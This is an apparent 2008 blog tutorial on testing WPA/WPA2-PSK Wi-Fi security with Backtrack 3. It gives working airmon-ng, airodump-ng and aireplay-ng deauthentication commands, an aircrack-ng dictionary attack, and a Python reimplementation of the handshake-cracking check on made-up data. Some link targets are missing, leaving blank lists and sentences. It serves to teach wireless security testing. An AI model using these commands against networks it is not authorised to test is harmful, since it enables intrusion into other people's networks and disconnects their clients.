Saturday, December 27, 2008

Hacking WPA/WPA2 with Backtrack 3

WPA and WPA2 are security protocols designed to protect the wireless network of your home or office from intruders and eavesdroppers. They replaced WEP, whose encryption is thoroughly broken and can be recovered in minutes given enough captured traffic. WPA/WPA2 in pre-shared-key (PSK) mode has no comparable cryptographic weakness: the practical attack against it is an offline dictionary attack on the passphrase, using a captured four-way handshake, and it only succeeds if the passphrase is weak. This tutorial walks through the currently available techniques for testing the security of your own wireless network. Be aware that breaking into your neighbor's network without permission is wrong.

What You Need

To test security of wireless networks, you can use the live CD Linux distribution called Backtrack. You can download its latest ISO image from and burn it with any CD burner program like InfraRecorder or CDBurnerXP. Alternatively, you can try the SliTaz Aircrack-NG distribution which is lighter and simpler than Backtrack.

Here's a list of what you need to crack WPA/WPA2:

Reboot your computer with a Backtrack CD and you'll be presented with the KDE environment.

Surveying Wireless Networks with Kismet

Launch Konsole, which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to point at your wireless device. The format is source=capturetype,interface,name; for example, for a Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Refer to Kismet documentation section 12 for the capture type of other chipsets. Save kismet.conf and run kismet.

Once Kismet starts detecting the wireless networks around you, press s and then P to sort the network list by packet count in descending order. Use the Up and Down keys to move to the target network and press i for network information or c for the client list. Write down the following:

  • ESSID (wireless network name)
  • BSSID (MAC address of access point)
  • channel of wireless network
  • MAC address of clients

Press x to close popup windows and Q to exit Kismet.

Brute-Force Dictionary Attack

Despite the name, this is a dictionary attack rather than a true brute force: the tool derives the key from each candidate passphrase in a wordlist and checks it against the captured handshake, so only passphrases that appear in the wordlist can be recovered.

airmon-ng stop wlan0
airmon-ng start wlan0

The commands above put your wireless device in monitor mode, in which the card passively listens to all wireless traffic on the channel without being associated to any network. Replace wlan0 with your wireless device name, such as eth1. With some drivers (madwifi-ng, for example) airmon-ng creates a separate monitor interface such as ath1 and prints its name; use that name in the commands below. Type iwconfig to make sure the card reports Mode:Monitor.

airodump-ng -w test wlan0

Skip the step above if you already surveyed the networks with Kismet as in the previous section. Here airodump-ng is used to survey the Wi-Fi networks; it hops channels and lists every access point and its associated clients. Press Ctrl+C to stop airodump-ng. Copy the BSSID (MAC address) and channel of the target network.

airodump-ng -w logfile -c 3 --bssid A0:B1:C2:D3:E4:F5 wlan0

Sniff and log the target network (specified with the --bssid option) on its channel (-c option) to the specified log file (-w option; airodump-ng appends a sequence number and extension, producing logfile-01.cap). Fixing the channel is important: the handshake is only a handful of frames and a channel-hopping capture will usually miss some of them. Wait until the message "WPA handshake: <BSSID>" appears in the top right corner of the screen. Then stop airodump-ng by pressing Ctrl+C.

Optionally, if airodump-ng shows a client associated with the target network but no handshake has been captured, you can deauthenticate that client by running the following example command in a separate terminal. Leave airodump-ng running on the same channel while you do this so that it captures the client's reconnection:

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0

where the -a option specifies the BSSID of the access point, the -c option specifies the client to deauthenticate, and -0 5 sends five bursts of deauthentication frames (-0 0 would send them until stopped). The client will usually reconnect within seconds and perform a fresh four-way handshake with the access point, which airodump-ng records. If it does not, you will have to wait until a client connects on its own and a handshake shows up in the airodump-ng output.

zcat /pentest/password/pico/cowpatty/final-wordlist.txt.gz > /tmp/wordlist.txt
aircrack-ng -a 2 -w /tmp/wordlist.txt logfile*.cap

Begin a dictionary attack using the saved capture file(s) and the specified wordlist (-w option); -a 2 selects WPA-PSK mode. For every word in the dictionary, aircrack-ng derives the pairwise master key from the word and the ESSID, derives the temporal keys from the captured nonces and MAC addresses, and checks whether the resulting message integrity code matches the one in the captured handshake. Each guess costs 4096 iterations of HMAC-SHA1, so a 2008-era CPU manages only a few hundred guesses per second, and a large dictionary can take hours or days. If the passphrase is not in the dictionary, or is a long random string of characters, you are out of luck: no amount of waiting will find it, and the dictionary attack won't be any good.
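The computation aircrack-ng performs for each word, written out as an added example (this is not code from the post or from aircrack-ng). It derives the PMK with PBKDF2, expands it to the PTK with the 802.11i PRF, and verifies the MIC of EAPOL message 2 of the handshake. Everything it consumes is constructed inline so that it runs offline: the SSID "testnet", the nonces, the wordlist and the EAPOL frame are made up, and the two MAC addresses are the ones from the aireplay-ng example above. In a real test these values come from the airodump-ng .cap file.

```python
# Offline WPA/WPA2-PSK dictionary attack, the check aircrack-ng -a 2 repeats per word.
# Added example for this post; the SSID, nonces, EAPOL frame and wordlist below are
# constructed, not captured from a real network.
import hashlib
import hmac
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), per IEEE 802.11i.
    The 4096 iterations are what make each guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1 blocks keyed with the PMK over
    "Pairwise key expansion" || 0x00 || min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces) || i."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:64]  # KCK = ptk[0:16], KEK = ptk[16:32], TK = ptk[32:48] for CCMP


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field (bytes 81..96) zeroed.
    The low 3 bits of Key Information (frame bytes 5-6) select the algorithm:
    1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1 truncated to 128 bits (WPA2/CCMP)."""
    version = eapol[6] & 0x07
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
          eapol: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol[81:97]
    for word in wordlist:
        kck = derive_ptk(derive_pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return word
    return None


# ---- constructed "capture" ----
SSID = "testnet"                          # constructed ESSID
AP_MAC = bytes.fromhex("00146c7e4080")    # the -a value from the aireplay-ng example
STA_MAC = bytes.fromhex("000fb5fdfbc2")   # the -c value from the aireplay-ng example
ANONCE = bytes(range(32))                 # constructed nonces (real ones are random)
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK


def build_msg2(snonce: bytes, mic: bytes) -> bytes:
    """EAPOL-Key message 2 of 4, the frame carrying the SNonce and the client's MIC.
    Key Information 0x010a = MIC set | Pairwise | descriptor version 2 (HMAC-SHA1)."""
    body = (b"\x02"                                   # descriptor type: RSN
            + b"\x01\x0a"                             # key information
            + b"\x00\x10"                             # key length 16 (CCMP)
            + b"\x00" * 8                             # replay counter
            + snonce                                  # key nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, RSC, key ID
            + mic                                     # key MIC: frame bytes 81..96
            + len(RSN_IE).to_bytes(2, "big") + RSN_IE)  # key data length + RSN IE
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key, length


def make_handshake(passphrase: str) -> bytes:
    """Build the message 2 a client configured with `passphrase` would have sent."""
    unsigned = build_msg2(SNONCE, b"\x00" * 16)
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, unsigned))


WORDLIST = ["password", "letmein", "qwertyuiop", "dictionary", "12345678"]  # constructed

if __name__ == "__main__":
    weak = make_handshake("dictionary")
    strong = make_handshake("Xk9#qLm2vP!r")
    print("weak passphrase  ->", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, weak, WORDLIST))
    print("random passphrase->", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, strong, WORDLIST))
```

The second run illustrates the caveat above: a passphrase that is not in the wordlist is never found, however long you let the loop run. Note also that the SSID is the PBKDF2 salt, which is why precomputed PMK tables (cowpatty's genpmk) only work for the specific network names they were built for.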

Finding a Good Dictionary

You need a good dictionary to crack WPA. The Backtrack 3 CD has wordlist files at the following locations:


Also, the aircrack-ng FAQ page has an extensive list of places where you can download good wordlists. In addition, I found a good wordlist called here.

Further Readings

